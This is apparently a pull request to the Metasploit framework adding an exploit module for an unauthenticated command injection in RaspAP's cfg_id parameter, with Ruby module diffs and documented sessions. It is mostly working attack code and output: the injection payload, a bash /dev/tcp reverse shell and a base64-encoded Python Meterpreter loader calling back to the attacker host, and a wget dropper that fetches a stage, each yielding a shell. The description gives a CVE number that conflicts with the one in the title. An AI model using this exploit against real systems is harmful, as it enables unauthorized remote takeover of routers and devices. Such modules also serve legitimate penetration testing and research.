### PR TITLE
Add RaspAP Unauthenticated Command Injection (CVE-2022-39986) Exploit

### DIFF
--- a/documentation/modules/exploit/unix/http/raspap_rce.md
+++ b/documentation/modules/exploit/unix/http/raspap_rce.md
@@ -35,19 +35,57 @@ For installing the vulnerable version follow the steps below,
 ```
 msf6 > use exploit/unix/http/raspap_rce 
 [*] Using configured payload cmd/unix/reverse_bash
-msf6 exploit(unix/http/raspap_rce) > set rhosts localhost
-rhosts => localhost
-msf6 exploit(unix/http/raspap_rce) > set lhost 192.168.2.101
-lhost => 192.168.2.101
+msf6 exploit(unix/http/raspap_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(unix/http/raspap_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
 msf6 exploit(unix/http/raspap_rce) > set lport 4444
 lport => 4444
 msf6 exploit(unix/http/raspap_rce) > run
 
-[*] Started reverse TCP handler on 192.168.2.101:4444 
+[*] Started reverse TCP handler on 172.17.0.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version Detected: 2.8.0
-[*] Sending exploit
+[+] The target appears to be vulnerable.
+[*] Executing Unix Command with bash -c '0<&121-;exec 121<>/dev/tcp/172.17.0.1/4444;sh <&121 >&121 2>&121'
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:52490) at 2023-08-10 00:38:57 +0200
 
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
+uname -a
+Linux d9db1face4f0 6.4.7-hardened1-2-hardened #1 SMP PREEMPT_DYNAMIC Wed, 02 Aug 2023 11:05:52 +0000 x86_64 GNU/Linux
+
+```
+
+```
+msf6 > use exploit/unix/http/raspap_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(unix/http/raspap_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(unix/http/raspap_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(unix/http/raspap_rce) > set target 1
+target => 1
+msf6 exploit(unix/http/raspap_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Executing Linux Dropper
+[*] Using URL: http://172.17.0.1:8080/cH0NvADRgGYZoL
+[*] Client 172.17.0.2 (Wget/1.21) requested /cH0NvADRgGYZoL
+[*] Sending payload to 172.17.0.2 (Wget/1.21)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:48940) at 2023-08-10 00:37:27 +0200
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid 
+Server username: www-data
+meterpreter > sysinfo 
+Computer     : 172.17.0.2
+OS           : Debian 11.6 (Linux 6.4.7-hardened1-2-hardened)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
 ```

--- a/documentation/modules/exploit/unix/http/raspap_rce.md
+++ b/documentation/modules/exploit/unix/http/raspap_rce.md
@@ -1,0 +1,53 @@
+## Vulnerable Application
+
+RaspAP is feature-rich wireless router software that just works
+on many popular Debian-based devices, including the Raspberry Pi.
+
+A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
+unauthenticated attackers to execute arbitrary commands via the cfg_id
+parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
+
+This Metasploit exploit module targets a command injection vulnerability (CVE-2022-39986) in RaspAP's web-gui PHP project,
+The vulnerability affects versions of `RaspAP` between `2.8.0` and `2.8.7`. By exploiting this flaw, an attacker can execute
+arbitrary commands. This issue was discovered and reported by Ismael0x00.
+Check [here](https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2) for the original writeup.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Follow the manual installation steps given [here](https://docs.raspap.com/manual/)
+2. After setting up the service, navigate to the `/var/www/html` directory
+3. Do `git checkout 2.8.0` for switching to the vulnerable version
+
+**Note: Project can also be installed inside a ubuntu/debian docker containers**
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/unix/http/raspap_rce`
+3. Do: `set RHOST [IP]`
+4. Do: `set RPORT [PORT]`
+5. Do: `check`
+
+## Options
+
+## Scenarios
+
+```
+msf6 > use exploit/unix/http/raspap_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(unix/http/raspap_rce) > set rhosts localhost
+rhosts => localhost
+msf6 exploit(unix/http/raspap_rce) > set lhost 192.168.2.101
+lhost => 192.168.2.101
+msf6 exploit(unix/http/raspap_rce) > set lport 4444
+lport => 4444
+msf6 exploit(unix/http/raspap_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.101:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version Detected: 2.8.0
+[*] Sending exploit
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```

--- a/documentation/modules/exploit/unix/http/raspap_rce.md
+++ b/documentation/modules/exploit/unix/http/raspap_rce.md
@@ -9,7 +9,7 @@ parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.ph
 
 This Metasploit exploit module targets a command injection vulnerability (CVE-2022-39986) in RaspAP's web-gui PHP project,
 The vulnerability affects versions of `RaspAP` between `2.8.0` and `2.8.7`. By exploiting this flaw, an attacker can execute
-arbitrary commands. This issue was discovered and reported by Ismael0x00.
+arbitrary commands in the context of the user running RaspAP. This issue was discovered and reported by Ismael0x00.
 Check [here](https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2) for the original writeup.
 
 ## Testing
@@ -32,30 +32,34 @@ For installing the vulnerable version follow the steps below,
 
 ## Scenarios
 
+### Debian 12, Unix Command Target
 ```
 msf6 > use exploit/unix/http/raspap_rce 
 [*] Using configured payload cmd/unix/reverse_bash
-msf6 exploit(unix/http/raspap_rce) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf6 exploit(unix/http/raspap_rce) > set lhost 172.17.0.1
-lhost => 172.17.0.1
-msf6 exploit(unix/http/raspap_rce) > set lport 4444
-lport => 4444
+msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130
+rhosts => 172.16.199.130
+msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
 msf6 exploit(unix/http/raspap_rce) > run
 
-[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable.
-[*] Executing Unix Command with bash -c '0<&121-;exec 121<>/dev/tcp/172.17.0.1/4444;sh <&121 >&121 2>&121'
-[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:52490) at 2023-08-10 00:38:57 +0200
+[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
+[*] Sending stage (24772 bytes) to 172.16.199.130
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400
 
-id
-uid=33(www-data) gid=33(www-data) groups=33(www-data)
-uname -a
-Linux d9db1face4f0 6.4.7-hardened1-2-hardened #1 SMP PREEMPT_DYNAMIC Wed, 02 Aug 2023 11:05:52 +0000 x86_64 GNU/Linux
-
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : debian
+OS           : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27)
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > 
 ```
 
+### Debian 11, Linux Dropper Target
 ```
 msf6 > use exploit/unix/http/raspap_rce 
 [*] Using configured payload cmd/unix/reverse_bash

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    res = send_request_cgi(
+    send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
       'method' => 'POST',
       'vars_post' => {

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -35,12 +35,31 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => ['unix', 'linux'],
         'Privileged' => false,
-        'Arch' => ARCH_CMD,
-        'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/unix/reverse_bash'
-        },
+        'Arch' => [ARCH_CMD, ARCH_X86,  ARCH_X64],
         'Targets' => [
-          [ 'Automatic Target', {}]
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => :wget,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
         ],
         'DisclosureDate' => '2023-07-31',
         'DefaultTarget' => 0,

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
           RaspAP is feature-rich wireless router software that just works
           on many popular Debian-based devices, including the Raspberry Pi.
           A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
-          unauthenticated attackers to execute arbitrary commands via the cfg_id
+          unauthenticated attackers to execute arbitrary commands as root via the cfg_id
           parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
 
           Successfully tested against RaspAP 2.8.0 and 2.8.7.

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -35,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => ['unix', 'linux'],
         'Privileged' => false,
-        'Arch' => [ARCH_CMD, ARCH_X86,  ARCH_X64],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Targets' => [
           [
             'Unix Command',
@@ -80,21 +81,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'README.md'),
-      'method' => 'GET'
-    ) # We can read version number from README.md since the official installation method uses git
-
+      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
+      'method' => 'POST'
+    )
     return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
-    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ /\[Release [\d.]+\]/
-
-    if version <= Rex::Version.new('2.8.7') &&
-       version >= Rex::Version.new('2.8.0')
-      return CheckCode::Appears("Version Detected: #{version}")
+    if res.code == 200
+      return CheckCode::Appears
     end
 
-    CheckCode::Safe("Version not vulnerable: #{version}")
+    CheckCode::Safe
   end
 
   def execute_command(cmd, _opts = {})
@@ -105,10 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'cfg_id' => ";#{cmd};#"
       }
     )
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
-    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
   end
-
 
   def exploit
     case target['Type']

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           RaspAP is feature-rich wireless router software that just works
           on many popular Debian-based devices, including the Raspberry Pi.
-          A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
+          A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
           unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id
           parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
 

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
       'method' => 'POST',
       'vars_post' => {
-        'cfg_id' => ";#{payload.encoded};"
+        'cfg_id' => ";#{payload.encoded};#"
       }
     )
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -70,8 +70,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ /\[Release [\d.]+\]/
 
-    if Rex::Version.new(version) <= Rex::Version.new('2.8.7') &&
-       Rex::Version.new(version) >= Rex::Version.new('2.8.0')
+    if version <= Rex::Version.new('2.8.7') &&
+       version >= Rex::Version.new('2.8.0')
       return CheckCode::Appears("Version Detected: #{version}")
     end
 

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'README.md'),
       'method' => 'GET'
-    ) # We can read version number from README.md since it is being installed from git
+    ) # We can read version number from README.md since the official installation method uses git
 
     return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -78,16 +78,27 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe("Version not vulnerable: #{version}")
   end
 
-  def exploit
-    print_status('Sending exploit')
+  def execute_command(cmd, _opts = {})
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
       'method' => 'POST',
       'vars_post' => {
-        'cfg_id' => ";#{payload.encoded};#"
+        'cfg_id' => ";#{cmd};#"
       }
     )
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+  end
+
+
+  def exploit
+    case target['Type']
+    when :unix_cmd
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}")
+      execute_cmdstager
+    end
   end
 end

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],
           ['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']
         ],
-        'Platform' => ['unix'],
+        'Platform' => ['unix', 'linux'],
         'Privileged' => false,
         'Arch' => ARCH_CMD,
         'DefaultOptions' => {

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -47,14 +47,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => []
         }
       )
     )
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])
+        OptString.new('TARGETURI', [ true, 'The URI of the RaspAP Web GUI', '/'])
       ]
     )
   end
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\[Release [\d.]+\]}
+    version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ /\[Release [\d.]+\]/
 
     if Rex::Version.new(version) <= Rex::Version.new('2.8.7') &&
        Rex::Version.new(version) >= Rex::Version.new('2.8.0')

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    version = res.body.match(/\[Release \d\.\d\.\d\]/).to_s.match(/\d\.\d\.\d/)
+    version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\[Release [\d.]+\]}
 
     if Rex::Version.new(version) <= Rex::Version.new('2.8.7') &&
        Rex::Version.new(version) >= Rex::Version.new('2.8.0')

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'RaspAP Unauthenticated Command Injection',
+        'Description' => %q{
+          RaspAP is feature-rich wireless router software that just works
+          on many popular Debian-based devices, including the Raspberry Pi.
+          A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
+          unauthenticated attackers to execute arbitrary commands via the cfg_id
+          parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
+
+          Successfully tested against RaspAP 2.8.0 and 2.8.7.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege BALCI <egebalci[at]pm.me>', # msf module
+          'Ismael0x00', # original PoC, analysis
+        ],
+        'References' => [
+          ['CVE', '2022-39986'],
+          ['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],
+          ['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']
+        ],
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2023-07-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'README.md'),
+      'method' => 'GET'
+    ) # We can read version number from README.md since it is being installed from git
+
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    version = res.body.match(/\[Release \d\.\d\.\d\]/).to_s.match(/\d\.\d\.\d/)
+
+    if Rex::Version.new(version) <= Rex::Version.new('2.8.7') &&
+       Rex::Version.new(version) >= Rex::Version.new('2.8.0')
+      return CheckCode::Appears("Version Detected: #{version}")
+    end
+
+    CheckCode::Safe("Version not vulnerable: #{version}")
+  end
+
+  def exploit
+    print_status('Sending exploit')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'ajax/openvpn/del_ovpncfg.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'cfg_id' => ";#{payload.encoded};"
+      }
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+  end
+end

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status('Sending exploit')
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'ajax/openvpn/del_ovpncfg.php'),
+      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
       'method' => 'POST',
       'vars_post' => {
         'cfg_id' => ";#{payload.encoded};"

--- a/modules/exploits/unix/http/raspap_rce.rb
+++ b/modules/exploits/unix/http/raspap_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
           RaspAP is feature-rich wireless router software that just works
           on many popular Debian-based devices, including the Raspberry Pi.
           A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
-          unauthenticated attackers to execute arbitrary commands as root via the cfg_id
+          unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id
           parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
 
           Successfully tested against RaspAP 2.8.0 and 2.8.7.


### PR DESCRIPTION
Hello :wave:

This module exploits the unquthenticated command injection veulnerability (CVE-2023-38096) in the [raspap-webgui](https://github.com/RaspAP/raspap-webgui) project.  The vulnerability exists in RaspAP versions **2.8.0** thru **2.8.7**. It allows unauthenticated attackers to execute arbitrary commands via the `cfg_id` parameter in `/ajax/openvpn/activate_ovpncfg.php`.

## Testing Environment Setup

For installing the vulnerable version follow the steps below,
1. Follow the manual installation steps given [here](https://docs.raspap.com/manual/)
2. After setting up the service, navigate to the `/var/www/html` directory
3. Do `git checkout 2.8.0` for switching to the vulnerable version


**Note: Project can also be installed inside ubuntu/debian docker containers**


## Verification

List the steps needed to make sure this thing works

- [ ] msfconsole
- [ ] Do: `use exploit/unix/http/raspap_rce`
- [ ] Do: `set RHOST [IP]`
- [ ] Do: `set RPORT [PORT]`
- [ ] Do: `check`